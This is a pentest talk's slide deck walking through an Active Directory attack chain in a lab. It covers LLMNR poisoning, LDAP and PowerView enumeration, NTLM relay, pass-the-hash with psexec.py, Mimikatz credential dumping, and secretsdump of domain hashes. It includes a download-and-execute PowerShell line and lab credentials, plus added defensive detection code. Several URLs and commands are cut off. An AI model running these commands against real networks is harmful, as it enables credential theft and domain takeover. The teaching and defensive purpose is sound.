Offensive Active Directory 101
Disclaimer
whoami
Michael Ritter
About me:
» Daily work: Service-Owner Pentesting at tacticx GmbH; coordination and management of penetration tests; performance of penetration tests (Infrastructure, Web, Rich-Client); security assessments of Active Directory environments; currently researching Purple Teaming topics
» Previously: Professional at Deloitte
» 5 years pentesting experience
» OSCP Certified
» Contact: @BigM1ke oNe, LinkedIn, XING
Agenda
pwny.corp - Attack
Basics
» What is Active Directory?
» Attack Landscape
» Active Directory Kill Chain
Phase 1 – Unauthorized User
» AD Enumeration without credentials
» Gaining initial Access
Phase 2 - Unprivileged User
» Taking advantage of LDAP
» Lateral movement techniques
» Basics NTLM Relay
Phase 3 - Privileged User
» Looting the thing
Mitigations
Basics
What is Active Directory and who uses it?
Basics
What is Active Directory?
» Microsoft's answer to directory services
» Active Directory is a hierarchical structure that stores objects in order to:
  » Access and manage the resources of an enterprise
  » Resources like: Users, Groups, Computers, Policies etc.
» 95% of Fortune 1000 companies use Active Directory
» Active Directory relies on different technologies in order to provide all features:
  » LDAP
  » DNS
» More information about the basics: nners-part-1/
Basics
Objects
» AD contains a lot of juicy information about the resources of an organization
» Following is an overview of the existing objects in AD:
Basics
Global Catalog
» The global catalog provides a central repository of domain information
» The global catalog provides a resource for searching an Active Directory forest
» LDAP queries use the global catalog to search for information
» Domain Users have read access to the global catalog
ry/how-global-catalog-servers-work(v=ws.10).aspx
Attack Landscape
Active Directory – Structure
Go Hunting?
(diagram credit: @ciyinet)
Basics
Active Directory – Privileged Accounts
AD environments can be way more complex than that. Think about all the services it provides.
(diagram credit: @ciyinet)
Basics
Broad landscape of attacks
Great attack landscape
(diagram credit: @ciyinet)
Active Directory kill chain
Broad landscape of attacks
Focus of this talk
at-analytics/ata-threats
Phase 1
Unauthorized User aka „Getting creds“
Phase 1
Starting Point
(network diagram: DC, Notebooks, Terminal Server, Workstations, Exchange, Attacker)
Phase 1 - Unauthorized User
Enumerate – Common network traffic
» Check out which network protocols are running and analyse them for potential weaknesses
Phase 1 - Unauthorized User
Enumerate DHCP
» DHCP info
Phase 1 - Unauthorized User
Enumerate DNS
» DNS recon
Phase 1 - Unauthorized User
Enumerate – Metadata from LDAP
» Get some information from the LDAP service
» This information is necessary for other devices that want to join the domain
Phase 1 - Unauthorized User
Enumerate – Metadata from LDAP
» Forest functionality level is set based on the highest OS functionality level a domain can
ds--functional-levels
Phase 1 - Unauthorized User
Results – AD Recon
Results:
» Domain name: pwny.lab
» Domain Controller: pwnylabdc01.pwny.lab (10.0.3.200)
» Subnet: 10.0.3.0/24
» Router: 10.0.3.1
» DC functionality level: Windows Server 2012
» Network clients:
  » workstation01.pwny.lab
  » workstation04.pwny.lab
Phase 1 - Unauthorized User
Gaining Access – Lots of opportunities to get initial access
Phase 1 - Unauthorized User
Gaining Access – Lots of opportunities to get initial access
There are many different ways to steal user credentials, like:
» Rogue devices
» Password spraying
» Default passwords (Tomcat, Jenkins & Co)
» Missing patches
» Cleartext passwords on file shares
» Vulnerable web applications
» Kerberoasting
» Social Engineering
» Phishing
» MITM
» Vulnerable software versions
» Have a look at the MITRE ATT&CK Matrix:
  » https://attack.mitre.org/wiki/Initial_Access
Phase 1 - Unauthorized User
Gaining Access – DNS fallback protocols
LLMNR, NBNS & Co.
» DNS fallback protocols:
  » Link Local Multicast Name Resolution (LLMNR)
  » NetBIOS Name Service (NBNS)
  » mDNS
» LLMNR & NBNS allow name resolution of failed DNS requests by leveraging other computers in the network
Network Layer Protection Analysis & Attack
Name resolution process
» Name resolution order:
  1. Local „hosts“ file
  2. DNS server
  3. Fallback protocols: LLMNR/NBNS/mDNS
» Usage of LLMNR & NBNS in the PWNY.corp network
Network Layer Protection Analysis & Attack
LLMNR/NBNS Poisoning Attack
(diagram: Victim, DNS Server, Network clients, Attacker)
1. Victim: Connect to //filsrv
2. DNS Server: I don‘t know that one
3. Victim (multicast to all network clients, including the attacker): Anyone know //filsrv?
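The detection side of the exchange above, as an added example that is not part of the original deck: a minimal LLMNR (RFC 4795) message parser plus a "canary name" check, where the defender queries a name that cannot exist in the domain and treats any host that answers it as a poisoner. The canary name, the transaction ids and the responder 10.0.3.66 are constructed fixtures, not captured traffic.

```python
import struct
from typing import Dict, List, Tuple

def encode_name(name: str) -> bytes:
    # DNS-style wire name: length-prefixed labels terminated by a zero byte
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"

def decode_name(pkt: bytes, off: int) -> Tuple[str, int]:
    # Read a wire name at `off`; returns (name, offset just past the name)
    labels = []
    while True:
        ln = pkt[off]
        off += 1
        if ln == 0:
            return ".".join(labels), off
        if ln & 0xC0:  # RFC 1035 compression pointer: follow it once
            tail, _ = decode_name(pkt, ((ln & 0x3F) << 8) | pkt[off])
            return ".".join(labels + [tail]), off + 1
        labels.append(pkt[off:off + ln].decode("ascii"))
        off += ln

def parse_llmnr(pkt: bytes) -> Dict:
    # Header (same layout as DNS), then questions, then A-record answers
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    off, questions, answers = 12, [], []
    for _ in range(qd):
        qname, off = decode_name(pkt, off)
        off += 4  # skip QTYPE and QCLASS
        questions.append(qname)
    for _ in range(an):
        rname, off = decode_name(pkt, off)
        rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata, off = pkt[off:off + rdlen], off + rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((rname, ".".join(str(b) for b in rdata)))
    return {"id": txid, "qr": bool(flags & 0x8000), "questions": questions, "answers": answers}

def find_poisoners(canaries: Dict[int, str], observed: List[Tuple[str, bytes]]) -> List[Dict]:
    # observed = (source IP, UDP payload); a host answering a canary name is a poisoner
    hits = []
    for src, raw in observed:
        msg = parse_llmnr(raw)
        want = canaries.get(msg["id"])
        if not msg["qr"] or want is None:
            continue
        for rname, ip in msg["answers"]:
            if rname.lower() == want.lower():
                hits.append({"responder": src, "name": want, "claimed_ip": ip})
    return hits

def _reply(txid: int, name: str, ip: List[int]) -> bytes:
    # Constructed test fixture: a one-answer LLMNR response (QR=1) for `name`
    return (struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
            + encode_name(name) + struct.pack("!HH", 1, 1)
            + encode_name(name) + struct.pack("!HHIH", 1, 1, 30, 4) + bytes(ip))

# Constructed fixtures: the canary we queried (a name that cannot exist in pwny.lab),
# a benign reply for workstation01, and a reply to the canary coming from 10.0.3.66
CANARIES = {0x1234: "pwnycanary-7f3a"}
OBSERVED = [("10.0.3.11", _reply(0x4321, "workstation01", [10, 0, 3, 11])),
            ("10.0.3.66", _reply(0x1234, "pwnycanary-7f3a", [10, 0, 3, 66]))]
```

In a live deployment the queries go out to 224.0.0.252:5355 and `OBSERVED` is fed from a socket or capture; a single hit is enough to investigate the responding host.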
Demo
Stealing credentials abusing LLMNR/NBT-NS
Phase 1 - Unauthorized User
Gaining Access
» Analysing and cracking the hashes
» Cracking the hashes
Phase 1 - Unauthorized User
Results
Results:
» Valid user account with password:
  » PWNY\jar.jar-binks:Welcome2015
» User password hashes for:
  » PWNY\darth.vader
  » PWNY\obi-wan.kenobi
  » PWNY\chewbacca
Phase 2 – Unprivileged Users
Taking advantage of LDAP
Phase 2 – Unprivileged user
Escalating privileges aka lateral movement
» During phase 1, it was possible to compromise an unprivileged user account:
  » Not a local admin on any machine
  » Not a member of any sensitive group
» What can you do with this?
  » Login to webmail/user mailbox (Ruler)
  » Enumerate available SMB shares (SMBMap, CrackMapExec)
  » Use available information in the Global Catalog to your advantage
Phase 2 – Unprivileged user
Taking advantage of LDAP
» Use available information in the Global Catalog to your advantage
» LDAP is the underlying directory access protocol in AD
» There are no special privileges needed to bind to LDAP - any valid account can read the entire directory! (by default)
» Create very flexible queries using LDAP. Examples:
  » Get a list of all domain users that contain *adm* in their account name
  » Get a list of all domain groups that contain *adm*
  » Get a list of all domain joined systems where the operating system is like *XP* or *2000*
  » Show all groups a user is memberOf
  » Recursively lookup all members of a group
  » Show all users that have a description like *pass* or *pw*
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP
# Get a list of all domain users
ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -b "dc=pwny,dc=lab" "(objectClass=user)" sAMAccountName userPrincipalName memberOf
# Get a list of all domain groups
ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -b "dc=pwny,dc=lab" "(objectClass=group)" sAMAccountName member memberOf
# Get a list of all domain joined systems
ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -b "dc=pwny,dc=lab" "(objectClass=computer)" name dNSHostName operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName
# Recursively lookup all members of a group (matching rule 1.2.840.113556.1.4.1941 = LDAP_MATCHING_RULE_IN_CHAIN)
ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -b "dc=pwny,dc=lab" "(&(objectClass=user)(memberof:1.2.840.113556.1.4.1941:=CN=Domänen-Admins,CN=Users,DC=PWNY,DC=LAB))" | grep sAMAccountName | cut -d" " -f2
# Show all groups a user is memberOf (cut the CN out of each group DN)
ldapsearch -LLL -x -H ldap://pwnylabdc01.pwny.lab -D "jar-jar.binks@pwny.lab" -w Welcome2015 -b "dc=pwny,dc=lab" "(sAMAccountName=darth.vader)" sAMAccountName userPrincipalName memberOf | grep memberOf | cut -d" " -f2 | cut -d"," -f1
ctiveDirectory.pdf
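What the recursive `memberof:1.2.840.113556.1.4.1941:=` query above (and the recursive group lookup in the PowerView slides) actually resolves, as an added example that is not part of the original deck: transitive group membership over a directory snapshot, including a group cycle, plus the three hygiene checks the slide lists (effective Domain Admins, passwords in descriptions, legacy operating systems) run the way an auditor would. The directory is a constructed miniature of pwny.lab; the Helpdesk group and the legacy01 computer are invented for the example.

```python
import re
from typing import Dict, List, Set

DA_DN = "CN=Domänen-Admins,CN=Users,DC=pwny,DC=lab"

# Constructed miniature of the pwny.lab directory (DN -> attributes); Helpdesk and
# legacy01 are invented to show nesting, a membership cycle and a legacy OS
DIRECTORY: Dict[str, Dict] = {
    DA_DN: {"objectClass": "group",
            "member": ["CN=luke.skywalker,CN=Users,DC=pwny,DC=lab",
                       "CN=Helpdesk,CN=Users,DC=pwny,DC=lab"]},
    "CN=Helpdesk,CN=Users,DC=pwny,DC=lab": {"objectClass": "group",
            "member": ["CN=chewbacca,CN=Users,DC=pwny,DC=lab", DA_DN]},  # cycle back to DA
    "CN=adm workstations,CN=Users,DC=pwny,DC=lab": {"objectClass": "group",
            "member": ["CN=obi-wan.kenobi,CN=Users,DC=pwny,DC=lab"]},
    "CN=luke.skywalker,CN=Users,DC=pwny,DC=lab": {"objectClass": "user",
            "sAMAccountName": "luke.skywalker", "description": "Domain admin"},
    "CN=chewbacca,CN=Users,DC=pwny,DC=lab": {"objectClass": "user",
            "sAMAccountName": "chewbacca", "description": "initial pw: Welcome2015"},
    "CN=obi-wan.kenobi,CN=Users,DC=pwny,DC=lab": {"objectClass": "user",
            "sAMAccountName": "obi-wan.kenobi", "description": "Workstation admin"},
    "CN=workstation04,CN=Computers,DC=pwny,DC=lab": {"objectClass": "computer",
            "operatingSystem": "Windows 7 Professional"},
    "CN=legacy01,CN=Computers,DC=pwny,DC=lab": {"objectClass": "computer",
            "operatingSystem": "Windows XP Professional"},
}

def members_in_chain(directory: Dict[str, Dict], group_dn: str) -> Set[str]:
    # Transitive membership, i.e. what the memberof:1.2.840.113556.1.4.1941:= filter
    # (LDAP_MATCHING_RULE_IN_CHAIN) resolves on the DC; `seen` breaks group cycles
    users, seen, todo = set(), set(), [group_dn]
    while todo:
        dn = todo.pop()
        if dn in seen:
            continue
        seen.add(dn)
        for m in directory.get(dn, {}).get("member", []):
            entry = directory.get(m, {})
            if entry.get("objectClass") == "group":
                todo.append(m)
            elif "sAMAccountName" in entry:
                users.add(entry["sAMAccountName"])
    return users

def groups_in_chain(directory: Dict[str, Dict], user_dn: str) -> Set[str]:
    # Reverse direction (every group a user is transitively a member of), derived from
    # `member` so the toy directory does not need back-linked memberOf attributes
    sam = directory[user_dn]["sAMAccountName"]
    return {g for g, a in directory.items()
            if a.get("objectClass") == "group" and sam in members_in_chain(directory, g)}

def audit(directory: Dict[str, Dict]) -> Dict[str, List[str]]:
    # The slide's hygiene checks, run by a defender against the same data
    out = {"effective_domain_admins": sorted(members_in_chain(directory, DA_DN)),
           "password_in_description": [], "legacy_os": []}
    for dn, a in directory.items():
        cn = dn.split(",")[0][3:]
        if a.get("objectClass") == "user" and re.search(r"pass|pw", a.get("description", ""), re.I):
            out["password_in_description"].append(a["sAMAccountName"])
        if a.get("objectClass") == "computer" and re.search(r"XP|2000", a.get("operatingSystem", "")):
            out["legacy_os"].append(cn)
    return out
```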
Phase 2 – Unprivileged user
Lateral movement - Taking advantage of LDAP
» Another nice tool for manual analysis is Active Directory Explorer from Sysinternals
  » You can use AD Explorer to easily navigate through the global catalog
  » Nice GUI to explore the environment
  » Define favorite locations
  » View object properties and attributes without having to open dialog boxes
  » Edit permissions
  » View an object's schema, and execute sophisticated searches that you can save and re-execute
Phase 2 – Unprivileged user
Lateral movement - PowerView
» PowerView is a PowerShell tool to gain network situational awareness on Windows domains
» No administrative credentials required
» My personal favorite
» Very useful for both “Blue” and “Red” Teams
» It contains a load of useful functions to identify possible issues in AD environments:
  » net * functions
  » GPO functions
  » User-Hunting functions
  » Domain Trust functions
  » Meta functions
» More details can be found at:
  » e/master/Recon
Phase 2 – Unprivileged user
Lateral movement - PowerView
Run PowerView from a non-domain joined machine:
# Load PowerView into memory (replace the placeholder with the raw URL of PowerView.ps1)
IEX (New-Object Net.WebClient).DownloadString("<raw URL of PowerView.ps1>")
# Use an alternate credential for any PowerView function
$SecPassword = ConvertTo-SecureString 'Welcome2015' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('PWNY\jar-jar.binks', $SecPassword)
# Check if everything works
Get-NetDomain -Credential $Cred  # test
Phase 2 – Unprivileged user
Lateral movement - PowerView
Enumerate all users, can be used for:
» Phishing and other social engineering attacks
» Password spraying
» ... be creative
# Get all the users
Get-NetUser -Credential $Cred | Format-Table name, samaccountname, userprincipalname, description
Phase 2 – Unprivileged user
Taking advantage of LDAP
All this information can be re-used for further attacks. For example:
» Usernames: password spraying
» Phone numbers: social engineering
» Mail addresses: phishing attacks
Phase 2 – Unprivileged user
Lateral movement - PowerView
Enumerate which groups a specific user is a member of
# List all groups of a specific user
Get-DomainGroup -MemberIdentity darth.vader -Credential $Cred | Format-Table cn
Phase 2 – Unprivileged user
Lateral movement - PowerView
Enumerate existing groups
# Get all existing groups
Get-NetGroup -Credential $Cred | Format-Table cn, distinguishedname, description
# Only groups with *adm* in the name
Get-NetGroup *adm* -Credential $Cred | Format-Table cn, distinguishedname, description
Phase 2 – Unprivileged user
Lateral movement - PowerView
Enumerate the members of a specific group (recursively)
# List all members of a specific group
Get-NetGroupMember -Identity "Domänen-Admins" -Recurse -Credential $Cred | Format-Table groupname, memberdomain, membername
Phase 2 – Unprivileged user
Lateral movement - PowerView
Go for a hunt and check out which users have active sessions on network computers
# Go hunting for active user sessions
Invoke-UserHunter -ShowAll -Credential $Cred -ComputerName workstation04 | Format-Table -Property userdomain, username, computername, ipaddress
Remember that one?
Phase 2 – Unprivileged user
Lateral movement - PowerView
List members of local groups of any system that has joined the domain
# List all members of a specific local group
Get-NetLocalGroupMember -ComputerName workstation04 -GroupName Administratoren -Credential $Cred | Format-Table membername, isgroup, isdomain
Remember that one?
Phase 2 – Unprivileged user
Lateral movement – PowerView – Key takeaways
Key takeaways of the enumeration:
» obi-wan.kenobi is a member of the adm workstations group
» All members of the adm workstations group have administrative rights on the workstation04.pwny.lab system
» luke.skywalker, who is a member of “Domain Administrators”, has an active session on workstation04.pwny.lab
(diagram nodes: User obi-wan.kenobi, Group adm workstations, Computer workstation04, User luke.skywalker, Group Domain Administrators, Server pwnylabdc01)
Phase 2 – Unprivileged user
Lateral movement - BloodHound
» BloodHound enumerates the whole AD with normal user privileges and exports it into a graph.
» BloodHound requires the following sets of information from an Active Directory:
  » Who is logged on where?
  » Who has admin rights where?
  » What users and groups belong to what groups?
» All this information can be extracted with normal user privileges.
» This tool becomes very useful in more complex environments
ound/wiki/Getting-started
Phase 2 – Unprivileged user
Lateral movement - BloodHound
Perform the following steps to use BloodHound:
1. Use the “BloodHound PowerShell ingestor” to collect the data
   a. Possible without administrative privileges (in most cases)
2. Setup neo4j and BloodHound
   a. hound/wiki
3. Run BloodHound and import the data
i/Getting-started
Phase 2 – Lateral Movement
NTLM Relay to move laterally within a network
NTLM Relay
Using ntlmrelayx.py
What are the requirements for it to work?
» SMB Signing has to be deactivated on our target
  » By default disabled on all workstations and servers except DCs
» Authentication needs to be done with a user that has administrative privileges on the target in order to get RCE
Conclusion
» Force the victim to authenticate to the attacker's (maybe your) machine
Attacks to enforce authentication:
» LLMNR/NBNS Poisoning
» UNC Path Injection
» Websites – XSS, HTML injection, Directory Traversal, SQL injection etc.
» Office Documents etc.
» MITM
» Open -your-unc-path/
NTLM Relay
Forcing authentication using LLMNR/NBNS Poisoning Attack
(diagram: Victim, DNS Server, Network clients, Attacker)
1. Victim: Connect to //filsrv
2. DNS Server: I don‘t know that one
3. Victim (multicast to all network clients, including the attacker): Anyone know //filsrv?
NTLM Relay
NETNTLMv1/v2 Authentication Process
(diagram: obi-wan.kenobi working on workstation01; fileserver; pwnylabdc01)
1. workstation01 to fileserver: This is obi-wan.kenobi, I‘d like to log in
2. fileserver to workstation01: If you are really obi-wan.kenobi, then encrypt this challenge with obi-wan.kenobi‘s PW hash
3. workstation01 to fileserver: Here is the encrypted challenge
4. fileserver to pwnylabdc01: Here is the challenge and response of obi-wan.kenobi, is that valid?
5. pwnylabdc01 to fileserver: I have compared obi-wan.kenobi‘s challenge & response and it is valid/invalid!
6. fileserver to workstation01: Access Granted/Denied
NTLM Relay
Authentication Process – NETNTLMv1/v2 - Malicious
(diagram: obi-wan.kenobi working on workstation01; Attacker; workstation04; pwnylabdc01)
1. workstation01 to Attacker: This is obi-wan.kenobi, I‘d like to log in
2. Attacker to workstation04: This is obi-wan.kenobi, I‘d like to log in
3. workstation04 to Attacker: Encrypt this challenge with obi-wan.kenobi‘s PW hash
4. Attacker to workstation01: Encrypt this challenge with obi-wan.kenobi‘s PW hash
5. workstation01 to Attacker: Here is the encrypted challenge
6. Attacker to workstation04: Here is the encrypted challenge
7. workstation04 to pwnylabdc01: Here is the challenge and response of obi-wan.kenobi, is that valid?
8. pwnylabdc01 to workstation04: I have compared obi-wan.kenobi‘s challenge & response and it is valid!
9. workstation04 to Attacker: Access Granted!
10. Attacker to workstation01: Access DENIED!
Result: Remote Code Execution
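The SMB signing precondition from the requirements slide can be verified from a server's SMB2 NEGOTIATE response, whose SecurityMode field (MS-SMB2 section 2.2.4) carries the SIGNING_ENABLED and SIGNING_REQUIRED bits; a relayed session only works where signing is not required. Added example, not part of the original deck: a parser for that response and an audit that lists every host where signing is not required. The two responses are constructed fixtures standing in for workstation04 and pwnylabdc01, not captured traffic.

```python
import struct
from typing import Dict, List

SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002  # MS-SMB2 2.2.4 SecurityMode bits
SMB2_NEGOTIATE = 0x0000                              # Command field of the SMB2 header
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
            0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}

def parse_negotiate_response(msg: bytes) -> Dict:
    # SMB2 header (64 bytes): ProtocolId, StructureSize, CreditCharge, Status, Command, ...
    if msg[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 message")
    hdr_size, _credit, _status, command = struct.unpack_from("<HHIH", msg, 4)
    if hdr_size != 64 or command != SMB2_NEGOTIATE:
        raise ValueError("not an SMB2 NEGOTIATE response")
    # NEGOTIATE response body: StructureSize (65), SecurityMode, DialectRevision, ...
    body_size, sec_mode, dialect = struct.unpack_from("<HHH", msg, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {"dialect": DIALECTS.get(dialect, hex(dialect)),
            "signing_enabled": bool(sec_mode & SIGNING_ENABLED),
            "signing_required": bool(sec_mode & SIGNING_REQUIRED)}

def hosts_without_required_signing(responses: Dict[str, bytes]) -> List[str]:
    # Audit: a server that does not *require* signing will accept a relayed session,
    # so a defender wants this list to be empty
    return [host for host, msg in responses.items()
            if not parse_negotiate_response(msg)["signing_required"]]

def _fixture_response(sec_mode: int, dialect: int) -> bytes:
    # Constructed NEGOTIATE response carrying only the fields the parser reads, rest zeroed
    header = b"\xfeSMB" + struct.pack("<HHIH", 64, 0, 0, SMB2_NEGOTIATE) + bytes(50)
    body = struct.pack("<HHH", 65, sec_mode, dialect) + bytes(59)
    return header + body

# Constructed fixtures: a workstation with the Windows default (signing enabled but not
# required) and a domain controller (signing required by default policy)
RESPONSES = {
    "workstation04.pwny.lab": _fixture_response(SIGNING_ENABLED, 0x0210),
    "pwnylabdc01.pwny.lab": _fixture_response(SIGNING_ENABLED | SIGNING_REQUIRED, 0x0302),
}
```

Against live hosts the same parser is fed the first response after sending an SMB2 NEGOTIATE to TCP 445; the fix for a flagged host is the "Microsoft network server: Digitally sign communications (always)" policy.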
NTLM Relay
Authentication Process – NETNTLMv1/v2 - Malicious
Impacket
» Awesome collection of Python scripts for working with network protocols
» https://github.com/CoreSecurity/impacket
What protocols are featured?
» Ethernet, Linux "Cooked" capture.
» IP, TCP, UDP, ICMP, IGMP, ARP. (IPv4 and IPv6)
» NMB and SMB1/2/3 (high-level implementations).
» DCE/RPC versions 4 and 5, over different transports: UDP (version 4 exclusively), TCP, SMB/TCP, SMB/NetBIOS and HTTP.
» Portions of the following DCE/RPC interfaces: Conv, DCOM (WMI, OAUTH), EPM, SAMR, SCMR, RRP, SRVSC, LSAD, LSAT, WKST, NRPC
Demo
NTLM Relay
NTLM Relay
Results of the attack
» We dumped the hashes of the local SAM database on workstation04
» Can be used to Pass-the-Hash
» By default, Windows Vista and higher no longer store LM hashes on disk
» Benchmark on NTLM hashes with Sagitta Brutalis 1080 (8x GF GTX 1080):
  » 330 GH/s on NTLM (Hashcat)
epixoip/a83d38f412b4737e99bbef804a270c40
(diagram: LLMNR/NBNS Poisoning, then NTLM Relay performed using ntlmrelayx.py – By default it will perform a
NTLM Relay
Using ntlmrelayx.py
NTLM Relay
» Relaying hashes is possible
» ntlmrelayx.py also offers the option to run arbitrary commands on the system
» If the user is not admin you won't get RCE, however you can relay to other services like:
  » LDAP
  » IMAP
  » MSSQL
  » SMB
(screenshots: relaying to IMAP on the mail server and dumping all mails that contain the search term "password"; relaying to the LDAP server and creating a new user)
Pass-the-Hash
Using psexec.py to Pass-the-Hash
Pass-the-Hash
Using psexec.py to Pass-the-Hash and drop a shell
Run psexec and Pass-the-Hash
» 605ea71fca715caacfaa92088150:::
# Pass-the-Hash with psexec
python psexec.py helpdesk@workstation03 -hashes caacfaa92088150
Pass-the-Hash
Results of phase 2
Key takeaways after Pass-the-Hash to workstation04:
» We have local administrative rights on workstation04 and can execute code
» The “Domain Admin” luke.skywalker is working on this computer
(diagram nodes: User obi-wan.kenobi, Group adm workstations, Computer workstation04, User luke.skywalker, Group Domain Administrators, Server pwnylabdc01)
Phase 3 – Privileged Access
Keep moving laterally abusing local admin privileges
Phase 3 – Privileged user (local)
Lateral movement – Hunting down the Domain Administrators
» Administrative access to a computer means we can read process memory
  » Dumping memory contents of lsass.exe & extracting credentials
» Sysinternals ProcDump creates a minidump of the target process
  » Use Mimikatz to extract the credentials from it
  » Will not trigger AV
» Use Mimikatz in Metasploit to dump the credentials
  » Might trigger AV
dd996900.aspx
Demo
Dump creds with mimikatz
Phase 3 – Privileged user (local)
Lateral movement – Hunting down the Domain Administrators
Dump the credentials with Mimikatz from Meterpreter
# Dumping creds with meterpreter in metasploit using mimikatz (make sure you use a privileged account)
getsystem
load mimikatz
mimikatz_command -f privilege::debug
mimikatz_command -f
om/en-us/sysinternals/dd996900.aspx
Phase 3 – Privileged user (local)
Lateral movement – Key takeaways
Key takeaways after dumping the creds:
» We have valid credentials for the user luke.skywalker
» luke.skywalker is a member of the “Domain Admin” group, so we have administrative access to the domain controller
(diagram nodes: User obi-wan.kenobi, Group adm workstations, Computer workstation04, User luke.skywalker, Group Domain Administrators, Server pwnylabdc01)
Phase 3 – Privileged User
Looting the thing
Phase 3 – Privileged user (domain)
Looting the thing – secretsdump.py
» We have administrative access to the domain controller
» What now? Do you want persistence?
  » Dumping all user hashes
  » Creation of golden tickets
Phase 3 – Privileged user (domain)
Looting the thing – secretsdump.py
» On workstations:
  » secretsdump.py can be used to dump SAM/LSA secrets remotely
  » Performs various techniques to dump hashes from a remote machine without executing any agent there
» On DCs it will also handle NTDS.dit, using either:
  a) Get the domain users list and all hashes of all domain users (including historical ones) as well as Kerberos keys via the MS Directory Replication Service (MS-DRS) Remote Protocol
  b) Extract NTDS.dit via vssadmin executed with the smbexec approach
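The replication route in a) exercises the DS-Replication-Get-Changes extended rights on the domain object, which a DC records as Security event 4662 (control access, AccessMask 0x100) when directory service access auditing is enabled; only domain controllers should ever request those rights. Added example, not from the original deck: a detector over such events that alerts when any other principal requests them. The event records are constructed to mirror the 4662 fields, and the DC machine account names are assumptions.

```python
import re
from typing import Dict, Iterable, List

# Extended-right GUIDs (schema controlAccessRight objects) needed for DRS replication
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
CONTROL_ACCESS = 0x100  # AccessMask value for a control-access (extended) right

def replication_rights(properties: str) -> List[str]:
    # Map every replication GUID found in the event's Properties field to its right name
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]

def detect_replication_abuse(events: Iterable[Dict], dc_accounts: Iterable[str]) -> List[Dict]:
    # Alert on 4662 control-access events that request replication rights from any
    # principal that is not a domain controller's machine account
    allowed = {a.upper() for a in dc_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != CONTROL_ACCESS:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights or ev["SubjectUserName"].upper() in allowed:
            continue
        alerts.append({"subject": ev["SubjectUserName"], "rights": rights,
                       "dc": ev["Computer"]})
    return alerts

# Constructed events (not real log data): inter-DC replication by the assumed
# PWNYLABDC02$ account, a benign 4662 on a user object with a placeholder GUID,
# and a replication request issued with the compromised luke.skywalker account
EVENTS = [
    {"EventID": 4662, "Computer": "pwnylabdc01.pwny.lab", "SubjectUserName": "PWNYLABDC02$",
     "AccessMask": 0x100, "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "pwnylabdc01.pwny.lab", "SubjectUserName": "darth.vader",
     "AccessMask": 0x10, "ObjectType": "user",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},
    {"EventID": 4662, "Computer": "pwnylabdc01.pwny.lab", "SubjectUserName": "luke.skywalker",
     "AccessMask": 0x100, "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]
DC_ACCOUNTS = ["PWNYLABDC01$", "PWNYLABDC02$"]  # assumed machine accounts of the DCs
```

The rule depends on the "Audit Directory Service Access" subcategory being enabled on the DCs and on the allow-list of DC accounts being kept current; the second event shows that ordinary object access never matches.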
Demo
Dumping all the hashes – secretsdump.py
Phase 3 – Privileged user (domain)
Looting the thing – secretsdump.py
Run secretsdump.py with administrative creds on the domain controller
# Dumping hashes of all domain users (including password history hashes)
python